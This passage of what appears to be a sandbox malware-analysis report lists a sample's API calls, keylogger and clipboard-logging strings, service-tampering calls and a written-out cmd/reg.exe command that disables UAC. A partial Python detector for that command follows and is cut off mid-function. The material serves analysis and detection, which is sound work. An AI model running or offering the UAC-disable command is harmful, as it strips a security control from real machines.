                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                              • String ID:
                              • API String ID: 493672254-0
                              • Opcode ID: 5793459f2b05a341084337c73a07c815787686c6c1611b41556a500e88ced60e
                              • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                              • Opcode Fuzzy Hash: 5793459f2b05a341084337c73a07c815787686c6c1611b41556a500e88ced60e
                              • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                              APIs
                              • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                              • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastValue___vcrt_
                              • String ID:
                              • API String ID: 3852720340-0
                              • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                              • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                              • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                              • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                              APIs
                              • GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                              • _free.LIBCMT ref: 00446EF6
                              • _free.LIBCMT ref: 00446F1E
                              • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                              • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                              • _abort.LIBCMT ref: 00446F3D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free$_abort
                              • String ID:
                              • API String ID: 3160817290-0
                              • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                              • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                              • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                              • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ControlManager
                              • String ID:
                              • API String ID: 221034970-0
                              • Opcode ID: 5e98436304e62fec6e515a5957ef56b7dffb99f2b3dd76da12d6ba2fed702406
                              • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                              • Opcode Fuzzy Hash: 5e98436304e62fec6e515a5957ef56b7dffb99f2b3dd76da12d6ba2fed702406
                              • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ControlManager
                              • String ID:
                              • API String ID: 221034970-0
                              • Opcode ID: 91e0008218e0c7c995c924fae4d26e1d77b9d6fdfbd6be204ccbe7d00a4f3a0e
                              • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                              • Opcode Fuzzy Hash: 91e0008218e0c7c995c924fae4d26e1d77b9d6fdfbd6be204ccbe7d00a4f3a0e
                              • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ControlManager
                              • String ID:
                              • API String ID: 221034970-0
                              • Opcode ID: 00e877085fbe49e6d0340a997bb4557ed5df32502caa88c91b70e44b83d324dd
                              • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                              • Opcode Fuzzy Hash: 00e877085fbe49e6d0340a997bb4557ed5df32502caa88c91b70e44b83d324dd
                              • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                              APIs
                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Enum$InfoQueryValue
                              • String ID: [regsplt]$DG
                              • API String ID: 3554306468-1089238109
                              • Opcode ID: 3f7698b5142b9873052bacf43db5521a53273f77a33e8e4bcdd6c6336b8cbdf4
                              • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                              • Opcode Fuzzy Hash: 3f7698b5142b9873052bacf43db5521a53273f77a33e8e4bcdd6c6336b8cbdf4
                              • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe,00000104), ref: 00442714
                              • _free.LIBCMT ref: 004427DF
                              • _free.LIBCMT ref: 004427E9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$FileModuleName
                              • String ID: @)\$C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe
                              • API String ID: 2506810119-1628672718
                              • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                              • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                              • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                              • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                              APIs
                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                              • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                              • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                              • API String ID: 2974294136-753205382
                              • Opcode ID: 65db5e6ba34dbd168fe00558d70a1d929f1ffaa6cb32c497ca20c7c17160d0b3
                              • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                              • Opcode Fuzzy Hash: 65db5e6ba34dbd168fe00558d70a1d929f1ffaa6cb32c497ca20c7c17160d0b3
                              • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                              APIs
                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                              • wsprintfW.USER32 ref: 0040A905
                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: EventLocalTimewsprintf
                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                              • API String ID: 1497725170-248792730
                              • Opcode ID: aac721caecb394176a154b2374b0fdf620af402c3856e35041706e17cb35748e
                              • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                              • Opcode Fuzzy Hash: aac721caecb394176a154b2374b0fdf620af402c3856e35041706e17cb35748e
                              • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                              APIs
                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                              • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                              • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSizeSleep
                              • String ID: x~^
                              • API String ID: 1958988193-2563557489
                              • Opcode ID: 4ebf0acc99a1bd76ecb676338ad5ca66b749e389f9c6bdc81adf82034e374675
                              • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                              • Opcode Fuzzy Hash: 4ebf0acc99a1bd76ecb676338ad5ca66b749e389f9c6bdc81adf82034e374675
                              • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                              APIs
                              • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                              • GetLastError.KERNEL32 ref: 0041CA91
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ClassCreateErrorLastRegisterWindow
                              • String ID: 0$MsgWindowClass
                              • API String ID: 2877667751-2410386613
                              • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                              • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                              • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                              • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                              APIs
                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                              • CloseHandle.KERNEL32(?), ref: 00406A0F
                              • CloseHandle.KERNEL32(?), ref: 00406A14
                              Strings
                              • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CreateProcess
                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                              • API String ID: 2922976086-4183131282
                              • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                              • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                              • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                              • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
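The CreateProcessA record above is the sample turning UAC off: it launches cmd.exe with `/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f`, with dwCreationFlags 0x08000000 (CREATE_NO_WINDOW) so no console appears. Writing that HKLM value needs an elevated token, and the change only takes effect after the next reboot, so this is post-elevation tampering rather than a bypass in itself. The detector below is an added example, not code from the Joe Sandbox report or from the sample, that matches this behaviour in Sysmon-style process-creation (Event ID 1) and registry-value-set (Event ID 13) records. The event lines are constructed to mirror the report's command line; the field layout (key=value pairs joined by " | "), the file paths and the rule names are assumptions. It tolerates the `%windir%` prefix, `reg` without `.exe`, argument reordering and `/d 0x0`, and does not fire on the `/d 1` re-enable case.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style records (key=value fields joined by " | "), written to mirror the
# command line in the report above. Illustrative input, not events captured from the sample.
SAMPLE_EVENTS = [
    # cmd.exe /k wrapper launching reg.exe via %windir%, as the CreateProcessA record shows
    "EventID=1 | Image=C:\\Windows\\System32\\cmd.exe | ParentImage=C:\\Users\\user\\AppData\\Roaming\\sample.exe | "
    "CommandLine=cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f",
    # the child reg.exe process, with %windir% already expanded by cmd.exe
    "EventID=1 | Image=C:\\Windows\\System32\\reg.exe | ParentImage=C:\\Windows\\System32\\cmd.exe | "
    "CommandLine=C:\\Windows\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f",
    # the resulting registry write (Sysmon Event ID 13)
    "EventID=13 | Image=C:\\Windows\\System32\\reg.exe | "
    "TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA | Details=DWORD (0x00000000)",
    # benign: an administrator turning UAC back on must not fire
    "EventID=1 | Image=C:\\Windows\\System32\\reg.exe | ParentImage=C:\\Windows\\System32\\cmd.exe | "
    "CommandLine=reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f",
    # benign: unrelated DWORD write under HKCU
    "EventID=13 | Image=C:\\Windows\\explorer.exe | "
    "TargetObject=HKU\\S-1-5-21-1-2-3-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden | Details=DWORD (0x00000001)",
]

POLICY_KEY = r"\\policies\\system"

# reg add ...\Policies\System ... /v EnableLUA ... /d 0: tolerates "reg" or "reg.exe", a %windir% or
# full-path prefix, any switch order after the key, and "/d 0" or "/d 0x0". Case-insensitive like reg.exe.
UAC_DISABLE_CMDLINE = re.compile(
    r"\breg(?:\.exe)?\s+add\s+\S*" + POLICY_KEY + r"\b.*?/v\s+enablelua\b.*?/d\s+0(?:x0+)?(?:\s|$)",
    re.IGNORECASE,
)
# cmd.exe /k keeps the shell alive after reg.exe returns; a secondary signal seen in the report
CMD_K_WRAPPER = re.compile(r"\bcmd(?:\.exe)?\s+/k\b", re.IGNORECASE)
# registry-side view of the same change, independent of how the write was issued
UAC_VALUE_PATH = re.compile(POLICY_KEY + r"\\enablelua$", re.IGNORECASE)
ZERO_DWORD = re.compile(r"^DWORD\s*\(0x0+\)$", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'key=value | key=value' record into a dict (assumed layout)."""
    fields: Dict[str, str] = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def classify(ev: Dict[str, str]) -> List[str]:
    """Return the rule names that match a single parsed event."""
    hits: List[str] = []
    if ev.get("EventID") == "1":
        cmd = ev.get("CommandLine", "")
        if UAC_DISABLE_CMDLINE.search(cmd):
            hits.append("uac_disable_cmdline")
            if CMD_K_WRAPPER.search(cmd):
                hits.append("cmd_k_wrapper")
    elif ev.get("EventID") == "13":
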